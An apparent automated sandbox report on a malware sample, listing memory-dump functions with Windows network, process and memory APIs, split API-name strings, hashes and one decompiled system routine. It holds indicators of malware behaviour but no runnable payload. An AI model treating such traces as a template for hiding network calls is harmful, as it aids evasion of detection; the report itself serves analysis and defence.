Function 03258910, Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 42networkCOMMON

Download Yara Rule

APIs

HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 0325896C

Strings

HttpSendRequestA, xrefs: 0325895E, 03258969
HttpSendRequestA, xrefs: 0325891D
Send, xrefs: 03258931
Http, xrefs: 0325892A
SendRequestA, xrefs: 03258962, 0325896A
Requ, xrefs: 03258938
estA, xrefs: 0325893F
RequestA, xrefs: 03258966, 0325896B

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: HttpRequestSend
String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
API String ID: 360639707-2503632690
Opcode ID: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction ID: eb7433d1bff3a7e1585f7f37525ff492a207245f1d6f3cdeaca3d238562d0322
Opcode Fuzzy Hash: db97a3a7caecdf95fe0a304b753d44bd81bfc0f21146fd473aad3fd0d43d0554
Instruction Fuzzy Hash: 7F0162B2915119AFCB00DF98D8419EFBBBCEB44210F148189FD08A7304D670EE10CBE2

Uniqueness

Uniqueness Score: -1.00%

Function 03258805, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 03258878

Strings

Inte, xrefs: 0325882A
Conn, xrefs: 03258838
InternetConnectA, xrefs: 0325886A, 03258875
ectA, xrefs: 0325883F
ConnectA, xrefs: 03258872, 03258877
rnet, xrefs: 03258831
rnetConnectA, xrefs: 0325886E, 03258876

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 81d5ba34dff38c00fe7bf5aa45a0a785a6eec73e3ff46034683b4e856752f1a2
Instruction ID: a0f58f9fa20bcf169e8eab612c00c74ba5944e344e4ea500c7b1bbd4789c5c7e
Opcode Fuzzy Hash: 81d5ba34dff38c00fe7bf5aa45a0a785a6eec73e3ff46034683b4e856752f1a2
Instruction Fuzzy Hash: 15012DB2915118AFCB14DF99D940EEF7BB9EB48350F154288FE08A7200C670EE01CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 03258810, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 48networkCOMMON

Download Yara Rule

APIs

InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 03258878

Strings

Inte, xrefs: 0325882A
Conn, xrefs: 03258838
InternetConnectA, xrefs: 0325886A, 03258875
ectA, xrefs: 0325883F
ConnectA, xrefs: 03258872, 03258877
rnet, xrefs: 03258831
rnetConnectA, xrefs: 0325886E, 03258876

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: ConnectInternet
String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
API String ID: 3050416762-1024195942
Opcode ID: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction ID: 0b02ff42f45386e42db2f439fb2fe0bd38f82ac83614346be40d33034efb7594
Opcode Fuzzy Hash: 5a91d16494d0f57e6db0b04c43c500e05e142fe6b6b4993dc2c2e1d1dc4bd2c0
Instruction Fuzzy Hash: 86010CB2A15119AFCB14DF99D941EEFB7B9EB48310F154289FE08A7240D670EE11CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 032587A0, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 41networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 032587F7

Strings

InternetOpenA, xrefs: 032587ED, 032587F5
Inte, xrefs: 032587BA
Open, xrefs: 032587C8
rnet, xrefs: 032587C1
rnetOpenA, xrefs: 032587F1, 032587F6
A, xrefs: 032587CF

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction ID: 553139b4a3f0b2e6113a40989ec85fb7cb16b29a15a56a90324afabf94335ea5
Opcode Fuzzy Hash: a6bd7c6617a6fc903c9a7f07eed257647a49593ccfbd608e88943fc20d551768
Instruction Fuzzy Hash: CCF01DB6A11119AF8B14DF99DC419EBB7B8FF48310B048589BD1897201D670AE508BE1

Uniqueness

Uniqueness Score: -1.00%

Function 03258798, Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 37networkCOMMON

Download Yara Rule

APIs

InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 032587F7

Strings

InternetOpenA, xrefs: 032587ED, 032587F5
Inte, xrefs: 032587BA
Open, xrefs: 032587C8
rnet, xrefs: 032587C1
rnetOpenA, xrefs: 032587F1, 032587F6
A, xrefs: 032587CF

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: InternetOpen
String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
API String ID: 2038078732-3155091674
Opcode ID: f8da0622abf67157d284c408612c63afd4383b996ec13b3c6e82e1e65255545f
Instruction ID: 8c5ae49eac9abc06f0f978f828f3a4c366380328e646ec6f60ce4f1083d9b565
Opcode Fuzzy Hash: f8da0622abf67157d284c408612c63afd4383b996ec13b3c6e82e1e65255545f
Instruction Fuzzy Hash: 46F06DB6A10219AF8B10DF88C841DEBBB78FF48300B048588FD1867201C270AA10CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 03256EA0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03256F48

Strings

net.dll, xrefs: 03256F11, 03256F97, 03256F6F, 03256F7B, 03256FA3
wininet.dll, xrefs: 03256EFE, 03256F07

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 37283fe063c4c8e5920dbd8fe477e832ba15348cc3f76263c60cec6245dc4c5d
Instruction ID: f68562a71e185db921a6846c6e6273340e23ca0253bc6a5e5bfc7ea02d9841d0
Opcode Fuzzy Hash: 37283fe063c4c8e5920dbd8fe477e832ba15348cc3f76263c60cec6245dc4c5d
Instruction Fuzzy Hash: 6831A1B5611305ABC715DF68C8A0FA7B7B8FB88700F44845DFA1A9B240D770B585CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03256E97, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 85sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000007D0), ref: 03256F48

Strings

net.dll, xrefs: 03256F11, 03256F6F, 03256F7B
wininet.dll, xrefs: 03256EFE, 03256F07

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: Sleep
String ID: net.dll$wininet.dll
API String ID: 3472027048-1269752229
Opcode ID: 845c04360eabf8422b90b53bb453ab1bf07b8042cb412971eaa6b7f38114a9cc
Instruction ID: 194df579a1049237de921eced70af4709c62d178ff1a1e1f347cd2a1444a0e87
Opcode Fuzzy Hash: 845c04360eabf8422b90b53bb453ab1bf07b8042cb412971eaa6b7f38114a9cc
Instruction Fuzzy Hash: DB319175A11301ABDB10DF68C8A1FABB7B8FB48700F54805DFA1A9B241D7B0A585CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 03258482, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03243B93), ref: 032584BD

Strings

.z`, xrefs: 032584AC, 032584B8

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: ed34ca01a1a4a79f2f37a89cf7ed6b73107232c5e538c1ef80e2850a58389b8a
Instruction ID: 309dbccd93f14b6247f2a4a460591ec0f4e03b117558d72bc27b500f7f6adc1c
Opcode Fuzzy Hash: ed34ca01a1a4a79f2f37a89cf7ed6b73107232c5e538c1ef80e2850a58389b8a
Instruction Fuzzy Hash: 69E0D8B81242455BDB14FF75D88089737E6AF803243144559E84997616CA36D5698BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03258490, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,03243B93), ref: 032584BD

Strings

.z`, xrefs: 032584AC, 032584B8

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap
String ID: .z`
API String ID: 3298025750-1441809116
Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction ID: c50934329907b51075e98e55ed6036a96956401abc06b356c21a7b1e262ab59f
Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
Instruction Fuzzy Hash: C3E04FB52103046BD714EF59CC44EA777ACEF88750F014554FD085B241C670F910CAF0

Uniqueness

Uniqueness Score: -1.00%

Function 03247070, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 032470CA
PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 032470EB

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 5c4eb80b81ce9238d804defb06ce88213f2808544c5f786be1bee036f0664b90
Instruction ID: ac790368a7e29a16586a5cd5788627863e14a9b30fc9c8e3d7576ee1d3fde957
Opcode Fuzzy Hash: 5c4eb80b81ce9238d804defb06ce88213f2808544c5f786be1bee036f0664b90
Instruction Fuzzy Hash: BE01DF31AA132877E725EA948C42FBE776C9B00A50F044118FF04BE1C0E7E4AA4686E5

Uniqueness

Uniqueness Score: -1.00%

Function 03256FCA, Relevance: 1.6, APIs: 1, Instructions: 118threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0324CCA0,?,?), ref: 0325700C

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: d90b179647e069d6442495b33ad8e927408eaa99d2e14d9714adb2c2e2c95021
Instruction ID: 5f7aa6898f8a74926e77a324103864d51886aed0823f8116b0c0701e28147599
Opcode Fuzzy Hash: d90b179647e069d6442495b33ad8e927408eaa99d2e14d9714adb2c2e2c95021
Instruction Fuzzy Hash: 0441CFB6261706ABD724DB68CCA0FE7B3E8EF44344F044519F9199B280C770B995CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03258661, Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0324CF72,0324CF72,?,00000000,?,?), ref: 03258620

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 77d5363f72d82462ec5fea4fff80f14dbc8d16f49a4d65e0b48ddc127789a8e5
Instruction ID: 5b018db456cc4b7d4bc18e233a94160d4852a71327457925ac45cfe110896500
Opcode Fuzzy Hash: 77d5363f72d82462ec5fea4fff80f14dbc8d16f49a4d65e0b48ddc127789a8e5
Instruction Fuzzy Hash: AB019EB66102047BDB10EF98DC84EE777ADEF88260F018559FE0D5B241D631EA418BB4

Uniqueness

Uniqueness Score: -1.00%

Function 03258595, Relevance: 1.6, APIs: 1, Instructions: 53COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0324CF72,0324CF72,?,00000000,?,?), ref: 03258620

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6134c64e33dbf41e8f29eef78b2f2c2bcf2836b2cb95125cfa22b25b0a901e81
Instruction ID: 5aaafc8dacd2242c9072237c32a08af1a85bfe27c142fc00f0eccecf4d69c1e7
Opcode Fuzzy Hash: 6134c64e33dbf41e8f29eef78b2f2c2bcf2836b2cb95125cfa22b25b0a901e81
Instruction Fuzzy Hash: 300169B6200244AFDB10DF68DC80EEB7BA8EF89654F158548FD8897641C670E914CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 03249AF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON

Download Yara Rule

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 03249B62

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
Instruction ID: c8373305d51bbf76b03d249fa1811ea372a0b9d585f9d25d7333242e5c30dc80
Opcode Fuzzy Hash: 2c78643bad6e30f4ea8c0f4a77ac75325507bca23f3a68eb4ab84608b245d78b
Instruction Fuzzy Hash: EA0121B9E5020EBBDF14DBE4DC42F9EB3789B54608F044195ED089B240F671EB94CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03258500, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03258554

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction ID: 41f874d736d81dd39dd668ef319282cdd8689da5d6d605ca2ea13cde1933faee
Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
Instruction Fuzzy Hash: 7E01AFB2211208ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 032584FD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON

Download Yara Rule

APIs

CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 03258554

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: CreateInternalProcess
String ID:
API String ID: 2186235152-0
Opcode ID: 6d9e697bff8fa5fb19e0b0afd23b5c0b15185e829b1ce7537df8bff8e6cd5d90
Instruction ID: 28c7f3dfffbe16e7f7f7ea485870d61d27ab368c330fb13dddb603db18a4522d
Opcode Fuzzy Hash: 6d9e697bff8fa5fb19e0b0afd23b5c0b15185e829b1ce7537df8bff8e6cd5d90
Instruction Fuzzy Hash: 7101F2B2215148AFCB44DF99DC80DEB7BA9AF8C214F19825CFA59A7201C630E841CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03256FD0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0324CCA0,?,?), ref: 0325700C

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
Instruction ID: 6e02c40eac2bace233213359f04faf9542e1ace04a0d44f797bc8a5bad51d396
Opcode Fuzzy Hash: ba2e822ebfdd2bb8a94d84977417bea092acd94697d130e792f27b2be464933f
Instruction Fuzzy Hash: 65E06D373913043AE330A59D9C02FA7B29C8B81B60F140026FA0DEB2C1D5A5F94142A4

Uniqueness

Uniqueness Score: -1.00%

Function 032585F0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,?,0324CF72,0324CF72,?,00000000,?,?), ref: 03258620

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction ID: d9ff81036aecaed9b19495ce5af96eacc7378a7e97b358f6741c252e8f220d21
Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
Instruction Fuzzy Hash: BEE01AB52002086BDB10EF59CC84EE737ADAF88650F018154FE085B241C970E9108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 03258450, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(032534D6,?,03253C4F,03253C4F,?,032534D6,?,?,?,?,?,00000000,00000000,?), ref: 0325847D

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction ID: b22e4724d50fe170c7007fa1338926e5f5c6f559a8bc03b6a16c8ef34de4d31e
Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
Instruction Fuzzy Hash: D3E046B6211308ABDB14EF99CC40EA777ACEF88660F158558FE085B241C670F910CBF0

Uniqueness

Uniqueness Score: -1.00%

Function 0324D3E0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03247A73,?), ref: 0324D40B

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction ID: 35ca4551b8bb8a00e852361266e930fbedd6642fffc1bc2107338545487fbb8a
Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
Instruction Fuzzy Hash: D9D0A7757603043BEA10FAA4AC03F2672CC5B44A40F494064FA48DB3C3D960F1014561

Uniqueness

Uniqueness Score: -1.00%

Function 0324D411, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00008003,?,?,03247A73,?), ref: 0324D40B

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1b7e2021c0a5607e61dba43f6539e5fe03fdc62dcd6596648521f145a15c3439
Instruction ID: 6447ec52d9bae112321fc0c6c434d6273abbe31ccc527732081e6887d609a6e3
Opcode Fuzzy Hash: 1b7e2021c0a5607e61dba43f6539e5fe03fdc62dcd6596648521f145a15c3439
Instruction Fuzzy Hash: B5D027315187870CD719D3745D01885FF5D5543134F19C19D80F5CB8E1D6109145C621

Uniqueness

Uniqueness Score: -1.00%

Function 032584C4, Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(032534D6,?,03253C4F,03253C4F,?,032534D6,?,?,?,?,?,00000000,00000000,?), ref: 0325847D

Memory Dump Source

Source File: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, Offset: 03240000, based on PE: false

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction ID: 168a6b5b57aa323f0e43f0e37dccbd2c042085ac2afbb31b532a89945d97599f
Opcode Fuzzy Hash: 8b57812a0cbed7a5b2e781b905e30819b576ee6384743d049dec2b73b6e88208
Instruction Fuzzy Hash: 2DC08CB510100029D32292A0FC40EF3BB2CCBC7BB6B214949FACC52010843298431A70

Uniqueness

Uniqueness Score: -1.00%

Function 0375967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 03759694

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
Instruction ID: 7c06ae1e292b2f386f418a5295893d4ca9075432bc6c5285c4573704a45a3a65
Opcode Fuzzy Hash: 9c53d21bcb42c3f324a3c9b016c7cd85311a322114853d32e16927a4d4e23741
Instruction Fuzzy Hash: CCB09B719024C9C9F615D76146087177944B7D5741F16C061E6020641B4778C095F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 037AFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E037AFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0375CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E037A5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E037A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x037afdda
0x037afde2
0x037afde5
0x037afdec
0x037afdfa
0x037afdff
0x037afe0a
0x037afe0f
0x037afe17
0x037afe1e
0x037afe19
0x037afe19
0x037afe19
0x037afe20
0x037afe21
0x037afe22
0x037afe25
0x037afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 037AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 037AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 037AFE01

Memory Dump Source

Source File: 00000006.00000002.486310336.00000000036F0000.00000040.00000001.sdmp, Offset: 036F0000, based on PE: true

Associated: 00000006.00000002.487139806.000000000380B000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.487161611.000000000380F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
Instruction ID: ae2a64a2e0877d44d23dbe522c54ffca407fd13f36942ecc5688439e4019a864
Opcode Fuzzy Hash: e74816ad56db7ec863f1384f7b04eaadd050bad28eb7ba277e4c5ba20673be22
Instruction Fuzzy Hash: DEF04C76100601BFD6205B49CC05F37BF5ADB80730F140314F628591D1E962F82086F0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cscript.exe PID: 6064 Parent PID: 3388 cscript.exeCOMMON

Executed Functions

Function 02978180, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON

Download Yara Rule

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,02973B57,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02973B57,007A002E,00000000,00000060,00000000,00000000), ref: 029781CD

Strings

.z`, xrefs: 029781BD, 029781C8

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 76d6c509b0e97e51e09ba6c79b0cca6c53ab50ce9ac4e0e969f1dbc3ddf22dba
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 2BF0BDB2201208ABCB08DF88DC84EEB77EDAF8C754F158248FA0D97240C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 02978230, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02973D12,5E972F59,FFFFFFFF,029739D1,?,?,02973D12,?,029739D1,FFFFFFFF,5E972F59,02973D12,?,00000000), ref: 02978275

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 8c3be53da2b47bbe7cae76110c8e2edcd72beba536278fd6f0977d87955153b5
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 82F0A4B2200208ABCB14DF89DC84EEB77ADAF8C754F158248BA1D97241D630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0297822A, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(02973D12,5E972F59,FFFFFFFF,029739D1,?,?,02973D12,?,029739D1,FFFFFFFF,5E972F59,02973D12,?,00000000), ref: 02978275

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 3316ab9e8ccb45bfa3483e87ae7e1c6f1bd81862adc6de1ca14ed28f28cb3a2c
Instruction ID: 60f2f7668617f3243748e411c78e7c239900dd219f6858cb518c6f5dcf265a10
Opcode Fuzzy Hash: 3316ab9e8ccb45bfa3483e87ae7e1c6f1bd81862adc6de1ca14ed28f28cb3a2c
Instruction Fuzzy Hash: B5F0E2B2200108ABCB14DF88DC80EEB77A9BF8C354F168248FA1DA7251C630E8118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02978360, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02962D11,00002000,00003000,00000004), ref: 02978399

Memory Dump Source

Source File: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, Offset: 02960000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: db8c1ef4223d11bc92192e9680c431f9f2a5880db9f5d162781c85ad8e2657b2
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
